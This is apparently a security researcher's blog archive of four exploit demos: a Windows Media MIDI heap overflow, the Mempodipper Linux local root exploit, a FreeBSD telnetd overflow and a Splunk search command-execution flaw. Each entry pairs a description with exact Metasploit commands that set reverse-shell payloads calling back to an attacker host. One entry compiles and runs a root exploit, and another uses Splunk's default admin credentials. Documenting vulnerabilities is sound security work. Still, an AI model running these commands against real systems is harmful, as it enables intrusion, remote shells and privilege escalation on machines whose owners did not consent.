Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

MS12-004 Windows Media Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Shane Garrett
Coordinated public release of the vulnerability on 2012-01-10
Vulnerability exploited in the wild
Metasploit PoC provided on 2012-01-27

PoC provided by :

Shane Garrett
juan vazquez
sinn3r

Reference(s) :

MS12-004
CVE-2012-0003
OSVDB-78210
Trend Micro Blog Post

Affected version(s) :

Windows XP SP3
Windows XP Media Center Edition 2005 SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP2
Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems SP2
Windows Server 2008 for x64-based Systems SP2
Windows 7 for 32-bit Systems and Windows 7 for 32-bit Systems SP1
Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1
Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based Systems SP1

Tested on Windows XP SP3 with :

winmm.dll 5.1.2600.5512

Description :

This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved through Windows Media Player’s ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation to exceed what is available on the heap (0x400 bytes allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we set up, and force the browser to confuse types from tagVARIANT objects, which yields remote code execution in the context of the user. At this time, for the IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention). Note: based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Commands :

use exploit/windows/browser/ms12_004_midi
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0056 Mempodipper Linux Local Root Exploit Demo

Timeline :

Vulnerability discovered by zx2c4 (Jason A. Donenfeld)
Public release of the vulnerability on 2012-01-18
Exploit provided on 2012-01-23

PoC provided by :

zx2c4 (Jason A. Donenfeld)

Reference(s) :

CVE-2012-0056
EDB-ID-18411

Affected version(s) :

Linux kernels 2.6.39 and above (32-bit or 64-bit).

Tested on Ubuntu 11.10 with :

Linux ubuntu 3.0.0-15-generic

Description :

Mempodipper is an exploit for CVE-2012-0056, an issue in the handling of writes to /proc/pid/mem where permissions are not properly checked in Linux kernel versions 2.6.39 to current. A local, unprivileged user could use this flaw to escalate their privileges.

Commands :

whoami
gcc -o CVE-2012-0056-Mempodipper CVE-2012-0056-Mempodipper.c
./CVE-2012-0056-Mempodipper
whoami

CVE-2011-4862 FreeBSD Telnet Buffer Overflow Metasploit Demo

Timeline :

Vulnerability exploited in the wild
Public release of the vulnerability on 2011-12-23
Metasploit PoC provided on 2011-12-27

PoC provided by :

Jaime Penalba Estebanez
Brandon Perry
Dan Rosenberg
hdm

Reference(s) :

CVE-2011-4862
OSVDB-78020
FreeBSD-SA-11:08.telnetd

Affected version(s) :

All supported versions of FreeBSD.

Tested on FreeBSD 8.1-RELEASE

Description :

This module exploits a buffer overflow in the encryption option handler of the FreeBSD telnet service.

Commands :

use exploit/freebsd/telnet/telnet_encrypt_keyid
set RHOST 192.168.178.112
set PAYLOAD bsd/x86/shell/reverse_tcp
set LHOST 192.168.178.100
exploit

id
uname -a

CVE-2011-4642 Splunk Search Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Gary O’Leary-Steele
Coordinated public release of the vulnerability on 2011-12-12
Metasploit PoC provided on 2011-12-22

PoC provided by :

Gary O’Leary-Steele
juan vazquez

Reference(s) :

CVE-2011-4642
OSVDB-77695
SPL-45172

Affected version(s) :

Splunk 4.2 to 4.2.4

Tested on Ubuntu 10.04.3 LTS with :

Splunk 4.2.4

Description :

This module abuses a command execution vulnerability in the web-based interface of Splunk 4.2 to 4.2.4. The vulnerability exists in the ‘mappy’ search command, which allows attackers to run Python code. To exploit this vulnerability, a valid Splunk user with the admin role is required. By default, this module uses the credentials “admin:changeme”, the default Administrator credentials for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows and as root on Linux by default.

Commands :

use exploit/multi/http/splunk_mappy_exec
set RHOST 192.168.178.110
set VHOST blackhole.zataz.loc
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit

id
uname -a